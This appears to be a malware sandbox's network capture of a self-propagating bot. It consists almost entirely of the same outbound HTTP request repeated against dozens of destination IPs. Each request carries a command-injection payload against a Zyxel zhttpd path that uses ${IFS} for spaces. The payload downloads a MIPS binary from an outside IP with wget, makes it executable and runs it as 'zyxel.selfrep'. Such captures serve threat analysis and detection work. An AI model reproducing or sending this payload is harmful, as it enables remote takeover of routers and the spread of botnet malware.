                                        Jan 14, 2024 16:18:59.824017048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8666192.168.2.135117861.10.210.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.824095011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8667192.168.2.133395060.110.72.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.824155092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8668192.168.2.135183251.75.90.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.824235916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8669192.168.2.1344522161.224.242.114443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.824260950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8670192.168.2.13360005.17.187.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.824322939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8671192.168.2.1337162194.72.47.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.824352980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8672192.168.2.1354896134.185.34.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.824440002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8673192.168.2.1335600207.208.205.105443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.824491024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8674192.168.2.134827074.39.225.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:59.824556112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8675192.168.2.133750273.50.220.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.838871956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8676192.168.2.1338922216.28.44.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.838922024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8677192.168.2.1346244155.179.41.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.838964939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8678192.168.2.134714875.222.146.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.839018106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8679192.168.2.134096446.207.80.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.839061022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8680192.168.2.1352086176.78.158.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.839090109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8681192.168.2.135924420.71.60.198443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.839152098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8682192.168.2.134463257.0.29.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.839196920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8683192.168.2.1334238198.120.62.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.839240074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8684192.168.2.1333126107.80.240.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.839266062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8685192.168.2.1351400131.188.189.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.839313984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8686192.168.2.1356148145.0.98.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.839348078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8687192.168.2.1335078101.147.163.12443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.839406013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8688192.168.2.1337426100.205.223.150443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.839431047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8689192.168.2.1337452187.29.105.114443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.839487076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8690192.168.2.133853286.4.241.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.839510918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8691192.168.2.1351432208.124.41.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.839555979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8692192.168.2.135048257.211.151.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.839597940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8693192.168.2.1350402206.136.137.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.839627981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8694192.168.2.1347010171.98.37.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.839659929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8695192.168.2.133554070.68.31.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.839704037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8696192.168.2.1347542172.72.23.156443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.839735985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8697192.168.2.1349304209.64.110.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.839781046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8698192.168.2.1347764164.149.49.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.839818001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8699192.168.2.13571845.141.228.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.839863062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8700192.168.2.1355840119.196.219.110443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.839937925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8701192.168.2.135817236.87.114.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.839937925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8702192.168.2.133429688.193.129.211443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.839975119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8703192.168.2.134349891.87.146.249443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.839986086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8704192.168.2.135912699.102.241.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.839986086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8705192.168.2.1358248115.56.114.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.840013027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8706192.168.2.135006299.37.23.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.840063095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8707192.168.2.1351422121.168.135.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.840092897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8708192.168.2.134555612.180.50.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.840123892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8709192.168.2.133393072.218.254.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.840178013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8710192.168.2.1345550151.29.179.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.840204954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8711192.168.2.134562259.13.56.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.840228081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8712192.168.2.133768636.34.129.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.840277910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8713192.168.2.1348618158.72.151.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.840291023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8714192.168.2.1357578119.141.10.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.840331078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8715192.168.2.1338250194.182.141.105443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.840373039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8716192.168.2.1354052111.98.184.238443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.840425014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8717192.168.2.1338984205.194.138.253443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.840456963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8718192.168.2.134265078.26.245.191443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.840498924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8719192.168.2.134200458.9.210.117443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.840544939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8720192.168.2.134151882.123.255.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.840599060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8721192.168.2.135512620.77.74.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.840665102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8722192.168.2.1346522134.13.20.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.840693951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8723192.168.2.133701438.205.27.88443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.840744019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8724192.168.2.135920419.202.1.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.840785027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8725192.168.2.1355572132.67.201.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.840832949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8726192.168.2.1342246195.226.144.89443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.840877056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8727192.168.2.1355260146.230.15.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:19:00.840913057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8728192.168.2.134499612.128.120.170443
                                        TimestampBytes transferredDirectionData
